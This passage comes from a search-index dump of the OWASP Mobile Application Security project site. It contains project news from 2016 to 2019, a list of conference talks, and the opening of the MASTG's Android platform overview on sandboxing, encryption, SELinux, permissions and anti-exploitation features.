"},{"location":"news/#october-2nd-2019-mstg-playground-release","title":"October 2nd, 2019: MSTG Playground Release!","text":"Want more training apps? We hear you! We just released the MSTG-Android-Java & MSTG-Android-Kotlin for Android and the MSTG-JWT app for iOS. Come and check it out at the release page! With special thanks to Sven Schleier (@sushi2k), Wen Bin Kong (@kongwenbin), Nikhil Soni (@nikhil), and Ryan Teoh (@ryantzj).
"},{"location":"news/#october-2nd-2019-mstg-project-joins-hacktoberfest","title":"October 2nd, 2019: MSTG Project joins Hacktoberfest!","text":"We are joining the #hacktoberfest October 2-31. Check out our issues at Github. Register at https://hacktoberfest.digitalocean.com.
"},{"location":"news/#september-17th-2019-xamarin-experiment","title":"September 17th, 2019: Xamarin experiment!","text":"We have launched a react-native experiment based on our compliance checklist. Want to teach others how to validate React Native apps against the MASVS? Check this Google sheet!
"},{"location":"news/#september-6th-2019-flutter-experiment","title":"September 6th, 2019: Flutter experiment!","text":"We have launched a react-native experiment based on our compliance checklist. Want to teach others how to validate React Native apps against the MASVS? Check this Google sheet!
"},{"location":"news/#september-6th-2019-react-native-experiment","title":"September 6th, 2019: React native experiment!","text":"We have launched a react-native experiment based on our compliance checklist. Want to teach others how to validate React Native apps against the MASVS? Check this Google sheet!
"},{"location":"news/#august-29th-2019-carlos-holguera-joins-the-leader-team","title":"August 29th, 2019: Carlos Holguera joins the leader team","text":"We are happy to announce that Carlos Holguera joins us as an official MSTG Author and co-leader! With a team of 3 we hope to march further as that would make our lives easier given that all of this hard work is done by volunteers!
"},{"location":"news/#august-4th-2019-oss-release","title":"August 4th, 2019: OSS Release!","text":"After a lot of work, we finally have a new release of the MSTG! Want to know more? Head over to the Github release page.
"},{"location":"news/#august-2nd-2019-project-promoted-to-flagship-status","title":"August 2nd, 2019: Project promoted to Flagship status!","text":"We have been awarded Flagship status! We are very grateful and excited about this! We could not have done this without our team of awesome volunteers that have committed to the project, wrote issues, and supported us in many other ways. A special thanks goes out to OWASP and especially Harold Blankenship for facilitating us to function as a project and for leading the project review at OWASP Appsec Tel-Aviv! Thank you!
"},{"location":"news/#june-5th-2019-new-release-of-the-masvs","title":"June 5th, 2019: New release of the MASVS","text":"As the summit is progressing, so are we! We have just released a new version of the MASVS (1.1.4). Want to know more? Head over to the Github release page!
"},{"location":"news/#may-21nd-2019-new-release-of-the-mstg","title":"May 21nd, 2019: New release of the MSTG","text":"As part of the preparations for the Open Security Summit, we have released a new version of the MSTG. Want to know more? Head over to the Github release page!
"},{"location":"news/#may-7th-2019-new-release-of-the-mstg","title":"May 7th, 2019: New release of the MSTG","text":"After many changes, we decided it was time to create a new release in order to improve the book version! Want to know more? Head over to the Github release page.
"},{"location":"news/#april-15th-2019-book-version-project-promotion-preparation-for-the-summit","title":"April 15th, 2019: Book version, project promotion & preparation for the summit","text":"Given that most news is already shared via OWASP Slack over the last quarter, we still see that it is good to share a summary of all of the good things outside of Slack using this news section. In this update we have a lot to share! While we started off this year with an improved version of the MASVS and MSTG, things have not been quiet: there has been a huge development in master of the MSTG and many issues have been raised and fixed. In the meantime, we have worked on an actual print of the book! While an early version is available through Hulu (no link supplied, google and buy at your own risk), we are working on making a better version of that book. In the mean time we have filed for a project promotion to Flagship! Next a lot more cool things happened: with the now official publication of NIST Special Publication (SP) 800-163 Revision 1, the MASVS and MSTG are getting more mainstream ;-). The MASVS & MSTG are mentioned in various other upcoming programs/standards/recommendations as well, which is really a recognition of the hard work put in by the community. We are proud to be part of such a great project! Next, we are preparing to join the Open Security Summit again! Already three people will be on site, and at least one remote, but we would love to work with more people at the project again! Want to know more? Please get in touch via Slack and join the #project-mobile-app-security channel or follow us on Twitter.
"},{"location":"news/#january-15th-2019-release-of-improved-checklist","title":"January 15th, 2019: Release of improved checklist","text":"We released a new version of the checklist! This version has adaptable references so that it can be used with newer versions of the MSTG as well. This version is currently available in French and English and we hope to add the Russian, Japanese, German and Spanish version soon! Want to know more? Take a look at our release page!. We would like to thank our volunteers for their effort to deliver these easy to use checklists!
"},{"location":"news/#january-3rd-2019-multilanguage-release-112-of-the-masvs","title":"January 3rd, 2019: Multilanguage Release 1.1.2 of the MASVS","text":"We released the 1.1.2 version of the OWASP MASVS! This is the first version in Chinese, English, French, German, Japanese, Russian, and Spanish! Exactly: we just added French, German, Japanese and Chinese! Obviously this would not be possible without all the volunteers that helped us with translations, feedback, updating, and automating the release process! We are grateful for the awesome team that pulled this off! Want to see the result? Take a look at our release page!
"},{"location":"news/#november-39th-2018-release-110-of-the-mstg","title":"November 39th, 2018: Release 1.1.0 of the MSTG","text":"We released the 1.1.0 version of the OWASP MSTG! Now all requirements of the MASVS have at least one covering testcase. We would like to thank all of our contributors for their hard work! Want to check it out? Check the releases!.
"},{"location":"news/#october-28th-2018-call-for-company-references","title":"October 28th, 2018: Call for Company references","text":"We are looking for company references that are using or have used the OWASP-MSTG and/or MASVS. If you have done so and are ok with being mentioned: please email to sven.schleier@owasp.org.
"},{"location":"news/#october-28th-2018-the-masvs-is-getting-more-translations","title":"October 28th, 2018: The MASVS is getting more translations","text":"Thanks to Romuald, Koki and many others, new translations of the MASVS are popping up. We now have a Japanese translation added and the French, German and Persian translations are in development. Each of them will be released the moment our release-automation of the MASVS is completed. Until then: feel free to checkout the sources!
"},{"location":"news/#october-18th-2018-the-mstg-is-now-officially-an-owasp-lab-project","title":"October 18th, 2018: The MSTG is now officially an OWASP Lab Project!","text":"During AppSec US 2018 in San Jose the Mobile Security Testing Guide was reviewed by several volunteers to assess the maturity of the project. As a result our request for project graduation to lab status was granted. The reviews can be found here.
Thanks to Harold Blankenship for organising the project review event during AppSec US and for pushing things forward for all the OWASP projects and of course to all people that took the effort to review our project!
"},{"location":"news/#october-13th-2018-mstg-102-released-twitter-account","title":"October 13th, 2018: MSTG 1.0.2 released & Twitter account!","text":"While working hard towards the 1.1.0 milestone of the MSTG, we released the 1.0.2 version. From now onward we have better PDF, Epub and Mobi files! We hope to port this to the MASVS after the Github release. We now have an official Twitter account: @OWASP_MAS!
"},{"location":"news/#september-21th-2018-masvs-automation-started","title":"September 21th, 2018: MASVS automation started","text":"Now that the document generation process for the MSTG has been optimized enough for milestone 1.1.0 (and we reached #1000 in Github of issues and Pull requests), we have started to improve the MASVS releasing mechanism. This will be further improved after Appsec USA and the release of 1.1.0 of the MSTG.
"},{"location":"news/#september-16th-2018-mstg-101-released","title":"September 16th, 2018: MSTG 1.0.1 released","text":"The Mobile Security Testing Guide version 1.0.1 has been released using our automated release system (based on tagging). See the Release Notes for all the changes. We now have added pdf support and improved our .docx quiet a lot. We will further improve the release process for the pdf and epubs after milestone 1.1.0.
"},{"location":"news/#september-1st-2018-mobile-security-testing-guide-mentioned-in-nist-sp-163r1","title":"September 1st, 2018: Mobile Security Testing Guide mentioned in NIST SP-163r1","text":"The Mobile Security Testing Guide is now reference in NIST SP 800-163 Revision 1.
"},{"location":"news/#augustus-2nd-2018-mobile-app-security-verification-standard-releases","title":"Augustus 2nd, 2018: Mobile App Security Verification Standard Releases","text":"A lot has happened & we are happy to announce that version 1.1 of the MASVS got released! Not just in English, but in Spanish and Russian as well. Want to know more? check the releases!. We would like to thank our Russian and Spanish speaking volunteers that have put quite some effort in translating the document! Lastly, we would like to announce that not all minor version releases will be in this news-section, unless something really important changed. Do you want to have the latest version of the MASVS? Just check Github!
"},{"location":"news/#june-16th-2018-jeroen-willemsen-joins-as-project-lead","title":"June 16th, 2018: Jeroen Willemsen joins as project lead","text":"Jeroen Willemsen has joined as a project leader for the OMTG project.
"},{"location":"news/#june-15th-2018-mobile-security-testing-guide-release-10","title":"June 15th, 2018: Mobile Security Testing Guide - Release 1.0","text":"The Mobile Security Testing Guide is now available for download in various formats. This is the first release of the MSTG and is a great community effort. We want to thank all contributors through this great journey. Thank you!
"},{"location":"news/#january-13th-2018-mobile-app-security-verification-standard-release-10","title":"January 13th, 2018: Mobile App Security Verification Standard Release 1.0","text":"Version 1.0 of the MASVS is now available for download. This release contains several bug fixes and modifications to security requirements and is our first release.
"},{"location":"news/#september-14th-2017-mobile-app-security-verification-standard-update","title":"September 14th, 2017: Mobile App Security Verification Standard Update","text":"Version 0.9.4 of the MASVS is now available for download. This release contains several bug fixes and modifications to security requirements.
"},{"location":"news/#july-5th-2017-sponsorship-packages-announced","title":"July 5th, 2017: Sponsorship Packages Announced","text":"We are happy to announce that a limited amount of sponsorship packages will be made available shortly through our crowdfunding campaign. With these packages, we offer companies opportunities to create brand awareness and maximize visibility in the mobile security space. 100% of the funds raised go directly into the project budget and will be used to fund production of the final release.
"},{"location":"news/#june-17th-2017-the-owasp-mobile-security-testing-guide-summit-preview","title":"June 17th, 2017: The OWASP Mobile Security Testing Guide - Summit Preview","text":"The MSTG Summit Preview is an experimental proof-of-concept book created on the OWASP Summit 2017 in London. The goal was to improve the authoring process and book deployment pipeline, as well as to demonstrate the viability of the project. Note that the content is not final and will likely change significantly in subsequent releases.
"},{"location":"news/#mobile-security-testing-workshop-on-the-owasp-summit-2017","title":"Mobile Security Testing Workshop on the OWASP Summit 2017","text":"The OWASP MSTG team is organizing a 5-days mobile security track on the OWASP Summit 2017. The track consists of a series of book sprints, each of which focuses on producing content for a specific section in the OWASP MSTG, as well as proof-reading and editing the existing content. The goal is to make as much progress on the guide as is humanly possible. Depending on the number of participants, we\u2019ll split into sub-groups to work on different subsections or topic areas.
"},{"location":"news/#how-to-join","title":"How to Join","text":"Join up for the working session(s) you like by following the link(s) on the mobile security track page, then hitting the \"Edit this page here\" link at the bottom, and adding yourself to the \"participants\" field. Signing up is not mandatory, but helps us to better organize the sessions. Don\u2019t worry though if your session of choice happens on the \"wrong\" day - you can always simply stop by and we\u2019ll brief you on your topic of choice. After all, this is the Woodstock of appsec!
Mobile security track main page:
http://owaspsummit.org/Working-Sessions/Mobile-Security/
Mobile security track schedule:
http://owaspsummit.org/schedule/tracks/Mobile-Security.html/
"},{"location":"news/#april-5th-2017-mobile-app-security-verification-standard-update","title":"April 5th, 2017: Mobile App Security Verification Standard Update","text":"Version 0.9.3 of the MASVS is now available for download. This release contains several bug fixes and modifications to security requirements:
* Merged requirements 7.8 and 7.9 into one for simplification\n* Removed Anti-RE controls 8.1 and 8.2\n* Updated MSTG links to current master\n* Section \"Environmental Interaction\" renamed to \"Platform Interaction\"\n* Removed To-dos\n* Fixed some wording & spelling issues\n
"},{"location":"news/#january-31st-2017-mobile-app-security-verification-standard-v092-available-for-download","title":"January 31st, 2017: Mobile App Security Verification Standard v0.9.2 Available For Download","text":"The Mobile App Security Verification Standard (MASVS) has undergone a major revision, including a re-design of the security model and verification levels. We also revised many security requirements to address the multitude of issues raised on GitHub. The result is MASVS v0.9.2, which is now available for download in PDF format.
As the MASVS is nearing maturity, we have decided to freeze the requirements until the Mobile Testing Guide and checklists \"catch up\" (due to the one-to-one mapping between requirements in the MASVS and MSTG, changes to the requirements make it necessary to update the other documents as well, causing repeated effort). Unless major issues pop up, the current list will therefore remain in place until MASVS/MSTG v1.0, and further changes will be reserved for v1.1 or later releases.
The MASVS is a community effort to establish security requirements for designing, developing and testing secure mobile apps on iOS and Android. Join the OWASP Mobile Security Project Slack Channel to meet the project members! You can sign up for an account here.
"},{"location":"news/#january-28th-2017-mobile-crackmes-and-reversing-tutorials","title":"January 28th, 2017: Mobile Crackmes and Reversing Tutorials","text":"A key goal of the OWASP Mobile Testing Project is to build the ultimate learning resource and reference guide for mobile app reversers. As hands-on hacking is by far the best way to learn, we'd like to link most of the content to practical examples.
Starting now, we'll be adding crackmes for Android and iOS to the GitHub repo that will then be used as examples throughout the guide. The goal is to collect enough resources for demonstrating the most important tools and techniques in our guide, plus additional crackmes for practicing. For starters there are three challenges:
One of these three already has a documented solution in the guide. Tutorials for solving the other two still need to be added.
"},{"location":"news/#we-need-more-authors-and-contributors","title":"We Need More Authors and Contributors!","text":"Maybe you have noticed that the reverse engineering sections in the Mobile Testing Guide are incomplete. The reason: We're still in the starting stages and don't have a lot of authors and contributors (in fact, 99% of the reversing content was produced by one guy). We'd love to welcome you as a contributor of crackmes, tutorials, writeups, or simply new ideas for this project.
"},{"location":"news/#what-you-can-do","title":"What You Can Do","text":"The OWASP MSTG is an open project and there's a lot of flexibility - it mostly depends on your skill set and willingness to commit your time. That said, the some areas that need help are:
Help us figure out resiliency testing processes and obfuscation metrics The reversing part of the guide consists of the following chapters:
Tampering and Reverse Engineering - General Overview
Read the Contribution Guide first, and join the OWASP Mobile Security Project Slack Channel, where you'll find all the other project members.
"},{"location":"news/#january-22nd-2017-mobile-testing-guide-toc-available","title":"January 22nd, 2017: Mobile Testing Guide TOC Available","text":"As of now, we'll be auto-generating a table of contents out of the current MSTG master branch. This reflects the current state of the guide, and should make it easier to coordinate work between authors. A short-term goal is to finalize the structure of the guide so we get a clearer picture of what will be included in the final document. Lead authors are encouraged to complete the outline of their respective chapters.
On another note, we still need additional authors to help with all sections of the guide, including mobile operating system overviews, testing processes and techniques, and reverse engineering. Especially iOS authors are in short supply! As usual, ping us on the Slack Channel if you want to contribute.
"},{"location":"news/#december-4th-2016-call-for-authors-the-ultimate-open-source-mobile-app-reverse-engineering-guide","title":"December 4th, 2016: Call For Authors: The Ultimate Open-Source Mobile App Reverse Engineering Guide","text":"Reverse engineering is an art, and describing every available facet of it would fill a whole library. The sheer range techniques and possible specializations is mind-blowing: One can spend years working on a very specific, isolated sub-problem, such as automating malware analysis or developing novel de-obfuscation methods. For mobile app security testers, it can be challenging to filter through the vast amount of information and build a working methodology. Things become even more problematic when one is tasked to assess apps that are heavily obfuscated and have anti-tampering measures built in.
One of the main goals in the MSTG is to build the ultimate resource for mobile reverse engineers. This includes not only basic static and dynamic analysis, but also advanced de-obfuscation, scripting and automation. Obviously, writing all this content is a lot of work, both in terms of general content and OS-specific how-tos. We're therefore looking for talented authors that want to join the project early on. Topics include the following:
All of this is unpaid, volunteer work. However, depending on your contribution, you will be named in the \"lead authors\" or \"contributors\" list, and you'll be able to point to the fact that you co-authored the guide. You'll also be contributing to the field, helping others who are just starting out, and in turn becoming a happier person yourself (reaping the full benefits of your altruism).
"},{"location":"news/#where-do-i-sign-up","title":"Where do I sign up?","text":"First of all, have a look at the existing RE chapters outline. You'll probably immediately have ideas on how you can contribute. If that's the case, read the Contribution Guide first.
Then contact Bernhard Mueller - ideally directly on the OWASP Mobile Security Project Slack Channel, where you'll find all the other project members. You can sign up for an account here.
"},{"location":"talks/","title":"\ud83c\udf99 Talks","text":"Date Event Title Video Slides October 2023 OWASP AppSec US 2023 Refactoring Mobile App Security Soon Slides October 2023 OWASP AppSec US 2023 OWASP MAS Project Showcase Video Slides February 2023 Tech Talks by NowSecure OWASP MASVS v2 Updates Video Slides February 2023 OWASP AppSec EU 2023 Mobile Wanderlust\u201d! Our journey to Version 2.0! Video Slides November 2022 OWASP AppSec US 2022 Mobile Wanderlust\u201d! Our journey to Version 2.0! Soon Slides October 2022 NSConnect Inside the OWASP MASVS Refactor v2.0 Video Slides October 2022 Cybersec Chile Securing Mobile Apps with the OWASP MASVS and MASTG: Secure Storage and IPC N/A Slides September 2022 OWASP Global AppSec APAC Securing Mobile Apps with the OWASP MASVS and MASTG. Our journey to Version 2.0! Soon Slides July 2022 droidCon Berlin Securing Mobile Apps with the OWASP MASVS & MSTG Video Slides June 2022 OWASP Tunisia Securing Mobile Apps with the MASVS. Our Journey to v2.0 Video Slides June 2022 OWASP AppSec EU \u201cMobile Wanderlust\u201d! Our journey to Version 2.0! Video Slides February 2022 OWASP Toronto Insider's Guide to Mobile AppSec with OWASP MASVS Video N/A November 2021 NSConnect MASVS & MSTG Refactoring Video Slides September 2021 OWASP 20th Anniversary MASVS & MSTG Refactoring Video Slides September 2020 Ekoparty Security Conference (Spanish) OWASP Mobile Project and how to use it for white hat hacking Video Slides May 2020 OWASP Dutch Virtual chapter meetup MSTG Update Video N/A February 2020 OWASP New Zealand Day Building Secure Mobile Apps (you don\u2019t have to learn it the hard way!) N/A N/A January 2020 iOS Conf Singapore Building Secure iOS Apps (you don\u2019t have to learn it the hard way!) 
Video Slides October 2019 OWASP AppSec Day Melbourne Fixing Mobile AppSec Video N/A September 2019 OWASP Global AppSec Amsterdam Fast Forwarding mobile security with the OWASP Mobile Security Testing Guide N/A N/A September 2019 r2con in Barcelona radare2 and Frida in the OWASP Mobile Security Testing Guide Video Slides Summer 2019 Open Security summit 2019 Open Security summit 2019 N/A Slides April 2019 OWASP Kyiv OWASP MSTG in real life N/A N/A March 2019 AppDevcon (Amsterdam) Securing your mobile app with the OWASP Mobile Security Testing Guide N/A N/A November 2018 OWASP BeNeLux days 2018 Fast forwarding mobile security with the MSTG N/A Slides November 2018 OWASP Germany Day 2018 Introduction to Mobile Security Testing: Approaches and Examples using OWASP MSTG (in German) Video Slides October 2018 DBS AppSecCon (Singapore) Fixing Mobile AppSec N/A N/A October 2018 OWASP Bay Area Chapter Mobile Testing Workshop N/A N/A October 2018 OWASP AppSec USA Fixing Mobile AppSec N/A N/A October 2018 CSC 2018 A Perspective on Mobile Security in IoT and how OWASP can Help N/A Slides January 2018 OWASP North Sweden Umea Mobile Security Essentials N/A N/A January 2018 OWASP Gothenburg Mobile Security Essentials: All about the keying material Video N/A January 2018 OWASP Gotentburg Mobile Security Essentials: Introduction into OMTG Video N/A 2017 OWASP Day Indonesia 2017 Fixing Mobile AppSec N/A N/A 2017 OWASP Poland Day 2017 Testing Mobile Applications N/A Slides 2017 OWASP AppSec EU 2017 Fixing Mobile AppSec Video Slides"},{"location":"MASTG/","title":"OWASP MASTG","text":"GitHub Repo
Previously known as OWASP MSTG (Mobile Security Testing Guide)
The OWASP Mobile Application Security Testing Guide (MASTG) is a comprehensive manual for mobile app security testing and reverse engineering. It describes technical processes for verifying the controls listed in the OWASP MASVS.
Download the MASTG
Start exploring the MASTG:
Tests Techniques Tools Apps
Support the project by purchasing the OWASP MASTG on leanpub.com. All funds raised through sales of this book go directly into the project budget and will be used for technical editing and designing the book and fund production of future releases.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/","title":"Android Platform Overview","text":"This chapter introduces the Android platform from an architecture point of view. The following five key areas are discussed:
Visit the official Android developer documentation website for more details about the Android platform.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-architecture","title":"Android Architecture","text":"Android is a Linux-based open source platform developed by the Open Handset Alliance (a consortium led by Google), which serves as a mobile operating system (OS). Today the platform is the foundation for a wide variety of modern technology, such as mobile phones, tablets, wearable tech, TVs, and other smart devices. Typical Android builds ship with a range of pre-installed (\"stock\") apps and support installation of third-party apps through the Google Play store and other marketplaces.
Android's software stack is composed of several different layers. Each layer defines interfaces and offers specific services.
Kernel: At the lowest level, Android is based on a variation of the Linux Kernel containing some significant additions, including Low Memory Killer, wake locks, the Binder IPC driver, etc. For the purpose of the MASTG, we'll focus on the user-mode part of the OS, where Android significantly differs from a typical Linux distribution. The two most important components for us are the managed runtime used by applications (ART/Dalvik) and Bionic, Android\u2019s version of glibc, the GNU C library.
HAL: On top of the kernel, the Hardware Abstraction Layer (HAL) defines a standard interface for interacting with built-in hardware components. Several HAL implementations are packaged into shared library modules that the Android system calls when required. This is the basis for allowing applications to interact with the device's hardware. For example, it allows a stock phone application to use a device's microphone and speaker.
Runtime Environment: Android apps are written in Java and Kotlin and then compiled to Dalvik bytecode which can be then executed using a runtime that interprets the bytecode instructions and executes them on the target device. For Android, this is the Android Runtime (ART). This is similar to the JVM (Java Virtual Machine) for Java applications, or the Mono Runtime for .NET applications.
Dalvik bytecode is an optimized version of Java bytecode. It is created by first compiling the Java or Kotlin code to Java bytecode, using the javac and kotlinc compilers respectively, producing .class files. Finally, the Java bytecode is converted to Dalvik bytecode using the d8 tool. Dalvik bytecode is packed within APK and AAB files in the form of .dex files and is used by a managed runtime on Android to execute it on the device.
Before Android 5.0 (API level 21), Android executed bytecode on the Dalvik Virtual Machine (DVM), where it was translated into machine code at execution time, a process known as just-in-time (JIT) compilation. This enables the runtime to benefit from the speed of compiled code while maintaining the flexibility of code interpretation.
Since Android 5.0 (API level 21), Android executes bytecode on the Android Runtime (ART) which is the successor of the DVM. ART provides improved performance as well as context information in app native crash reports, by including both Java and native stack information. It uses the same Dalvik bytecode input to maintain backward compatibility. However, ART executes the Dalvik bytecode differently, using a hybrid combination of ahead-of-time (AOT), just-in-time (JIT) and profile-guided compilation.
Source: https://lief-project.github.io/doc/latest/tutorials/10_android_formats.html
Sandboxing: Android apps don't have direct access to hardware resources, and each app runs in its own virtual machine or sandbox. This enables the OS to have precise control over resources and memory access on the device. For instance, a crashing app doesn't affect other apps running on the same device. Android controls the maximum number of system resources allocated to apps, preventing any one app from monopolizing too many resources. At the same time, this sandbox design can be considered as one of the many principles in Android's global defense-in-depth strategy. A malicious third-party application, with low privileges, shouldn't be able to escape its own runtime and read the memory of a victim application on the same device. In the following section we take a closer look at the different defense layers in the Android operating system. Learn more in the section \"Software Isolation\".
You can find more detailed information in the Google Source article \"Android Runtime (ART)\", the book \"Android Internals\" by Jonathan Levin and the blog post \"Android 101\" by @_qaz_qaz.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-security-defense-in-depth-approach","title":"Android Security: Defense-in-Depth Approach","text":"The Android architecture implements different security layers that, together, enable a defense-in-depth approach. This means that the confidentiality, integrity or availability of sensitive user-data or applications doesn't hinge on one single security measure. This section brings an overview of the different layers of defense that the Android system provides. The security strategy can be roughly categorized into four distinct domains, each focusing on protecting against certain attack models.
Android supports device encryption from Android 2.3.4 (API level 10) and it has undergone some big changes since then. Google imposed that all devices running Android 6.0 (API level 23) or higher had to support storage encryption, although some low-end devices were exempt because it would significantly impact their performance.
Full-Disk Encryption (FDE): Android 5.0 (API level 21) and above support full-disk encryption. This encryption uses a single key protected by the user's device password to encrypt and decrypt the user data partition. This kind of encryption is now considered deprecated and file-based encryption should be used whenever possible. Full-disk encryption has drawbacks, such as not being able to receive calls or not having operative alarms after a reboot if the user does not enter the password to unlock.
File-Based Encryption (FBE): Android 7.0 (API level 24) supports file-based encryption. File-based encryption allows different files to be encrypted with different keys so they can be deciphered independently. Devices that support this type of encryption support Direct Boot as well. Direct Boot enables the device to have access to features such as alarms or accessibility services even if the user didn't unlock the device.
Note: you might hear of Adiantum, which is an encryption method designed for devices running Android 9 (API level 28) and higher whose CPUs lack AES instructions. Adiantum is only relevant for ROM developers or device vendors, Android does not provide an API for developers to use Adiantum from applications. As recommended by Google, Adiantum should not be used when shipping ARM-based devices with ARMv8 Cryptography Extensions or x86-based devices with AES-NI. AES is faster on those platforms.
Further information is available in the Android documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#trusted-execution-environment-tee","title":"Trusted Execution Environment (TEE)","text":"In order for the Android system to perform encryption it needs a way to securely generate, import and store cryptographic keys. We are essentially shifting the problem of keeping sensitive data secure towards keeping a cryptographic key secure. If the attacker can dump or guess the cryptographic key, the sensitive encrypted data can be retrieved.
Android offers a trusted execution environment in dedicated hardware to solve the problem of securely generating and protecting cryptographic keys. This means that a dedicated hardware component in the Android system is responsible for handling cryptographic key material. Three main modules are responsible for this:
Hardware-backed KeyStore: This module offers cryptographic services to the Android OS and third-party apps. It enables apps to perform cryptographically sensitive operations in a TEE without exposing the cryptographic key material.
StrongBox: In Android 9 (Pie), StrongBox was introduced as another approach to implement a hardware-backed KeyStore. Prior to Android 9 (Pie), a hardware-backed KeyStore could be any TEE implementation that lies outside of the Android OS kernel. StrongBox, in contrast, is a complete, separate hardware chip added to the device on which the KeyStore is implemented, and it is clearly defined in the Android documentation. You can check programmatically whether a key resides in StrongBox and if it does, you can be sure that it is protected by a hardware security module that has its own CPU, secure storage, and True Random Number Generator (TRNG). All the sensitive cryptographic operations happen on this chip, in the secure boundaries of StrongBox.
GateKeeper: The GateKeeper module enables device pattern and password authentication. The security sensitive operations during the authentication process happen inside the TEE that is available on the device. GateKeeper consists of three main components, (1) gatekeeperd
which is the service that exposes GateKeeper, (2) GateKeeper HAL, which is the hardware interface and (3) the TEE implementation which is the actual software that implements the GateKeeper functionality in the TEE.
We need to have a way to ensure that code that is being executed on Android devices comes from a trusted source and that its integrity is not compromised. In order to achieve this, Android introduced the concept of verified boot. The goal of verified boot is to establish a trust relationship between the hardware and the actual code that executes on this hardware. During the verified boot sequence, a full chain of trust is established starting from the hardware-protected Root-of-Trust (RoT) up until the final system that is running, passing through and verifying all the required boot phases. When the Android system is finally booted you can rest assured that the system is not tampered with. You have cryptographic proof that the code which is running is the one that is intended by the OEM and not one that has been maliciously or accidentally altered.
Further information is available in the Android documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#software-isolation","title":"Software Isolation","text":""},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-users-and-groups","title":"Android Users and Groups","text":"Even though the Android operating system is based on Linux, it doesn't implement user accounts in the same way other Unix-like systems do. In Android, the multi-user support of the Linux kernel is used to sandbox apps: with a few exceptions, each app runs as though under a separate Linux user, effectively isolated from other apps and the rest of the operating system.
The file system/core/include/private/android_filesystem_config.h includes a list of the predefined users and groups system processes are assigned to. UIDs (userIDs) for other applications are added as the latter are installed. For more details, check out the blog post \"An Overview Of Application Sandbox\" by Bin Chen on Android sandboxing.
For example, Android 9.0 (API level 28) defines the following system users:
#define AID_ROOT 0 /* traditional unix root user */\n #...\n #define AID_SYSTEM 1000 /* system server */\n #...\n #define AID_SHELL 2000 /* adb and debug shell user */\n #...\n #define AID_APP_START 10000 /* first app user */\n ...\n
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#selinux","title":"SELinux","text":"Security-Enhanced Linux (SELinux) uses a Mandatory Access Control (MAC) system to further lock down which processes should have access to which resources. Each resource is given a label in the form of user:role:type:mls_level
which defines which users are able to execute which types of actions on it. For example, one process may only be able to read a file, while another process may be able to edit or delete the file. This way, by working on a least-privilege principle, vulnerable processes are more difficult to exploit via privilege escalation or lateral movement.
Further information is available on the Android documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#permissions","title":"Permissions","text":"Android implements an extensive permissions system that is used as an access control mechanism. It ensures controlled access to sensitive user data and device resources. Android categorizes permissions into different types offering various protection levels.
Prior to Android 6.0 (API level 23), all permissions an app requested were granted at installation (Install-time permissions). From API level 23 onwards, the user must approve some permissions requests during runtime (Runtime permissions).
Further information is available in the Android documentation including several considerations and best practices.
To learn how to test app permissions refer to the Testing App Permissions section in the \"Android Platform APIs\" chapter.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#network-security","title":"Network security","text":""},{"location":"MASTG/Android/0x05a-Platform-Overview/#tls-by-default","title":"TLS by Default","text":"By default, since Android 9 (API level 28), all network activity is treated as being executed in a hostile environment. This means that the Android system will only allow apps to communicate over a network channel that is established using the Transport Layer Security (TLS) protocol. This protocol effectively encrypts all network traffic and creates a secure channel to a server. It may be the case that you would want to use clear traffic connections for legacy reasons. This can be achieved by adapting the res/xml/network_security_config.xml
file in the application.
Further information is available in the Android documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#dns-over-tls","title":"DNS over TLS","text":"System-wide DNS over TLS support has been introduced since Android 9 (API level 28). It allows you to perform queries to DNS servers using the TLS protocol. A secure channel is established with the DNS server through which the DNS query is sent. This assures that no sensitive data is exposed during a DNS lookup.
Further information is available on the Android Developers blog.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#anti-exploitation","title":"Anti-exploitation","text":""},{"location":"MASTG/Android/0x05a-Platform-Overview/#aslr-kaslr-pie-and-dep","title":"ASLR, KASLR, PIE and DEP","text":"Address Space Layout Randomization (ASLR), which has been part of Android since Android 4.1 (API level 15), is a standard protection against buffer-overflow attacks, which makes sure that both the application and the OS are loaded to random memory addresses making it difficult to get the correct address for a specific memory region or library. In Android 8.0 (API level 26), this protection was also implemented for the kernel (KASLR). ASLR protection is only possible if the application can be loaded at a random place in memory, which is indicated by the Position Independent Executable (PIE) flag of the application. Since Android 5.0 (API level 21), support for non-PIE enabled native libraries was dropped. Finally, Data Execution Prevention (DEP) prevents code execution on the stack and heap, which is also used to combat buffer-overflow exploits.
Further information is available on the Android Developers blog.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#seccomp-filter","title":"SECCOMP Filter","text":"Android applications can contain native code written in C or C++. These compiled binaries can communicate both with the Android Runtime through Java Native Interface (JNI) bindings, and with the OS through system calls. Some system calls are either not implemented, or are not supposed to be called by normal applications. As these system calls communicate directly with the kernel, they are a prime target for exploit developers. With Android 8 (API level 26), Android has introduced the support for Secure Computing (SECCOMP) filters for all Zygote based processes (i.e. user applications). These filters restrict the available syscalls to those exposed through bionic.
Further information is available on the Android Developers blog.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-application-structure","title":"Android Application Structure","text":""},{"location":"MASTG/Android/0x05a-Platform-Overview/#communication-with-the-operating-system","title":"Communication with the Operating System","text":"Android apps interact with system services via the Android Framework, an abstraction layer that offers high-level Java APIs. The majority of these services are invoked via normal Java method calls and are translated to IPC calls to system services that are running in the background. Examples of system services include:
The framework also offers common security functions, such as cryptography.
The API specifications change with every new Android release. Critical bug fixes and security patches are usually applied to earlier versions as well.
Noteworthy API versions:
Android development releases follow a unique structure. They are organized into families and given alphabetical codenames inspired by tasty treats. You can find them all here.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#the-app-sandbox","title":"The App Sandbox","text":"Apps are executed in the Android Application Sandbox, which separates the app data and code execution from other apps on the device. As mentioned before, this separation adds a first layer of defense.
Installation of a new app creates a new directory named after the app package, which results in the following path: /data/data/[package-name]
. This directory holds the app's data. Linux directory permissions are set such that the directory can be read from and written to only with the app's unique UID.
We can confirm this by looking at the file system permissions in the /data/data
folder. For example, we can see that Google Chrome and Calendar are assigned one directory each and run under different user accounts:
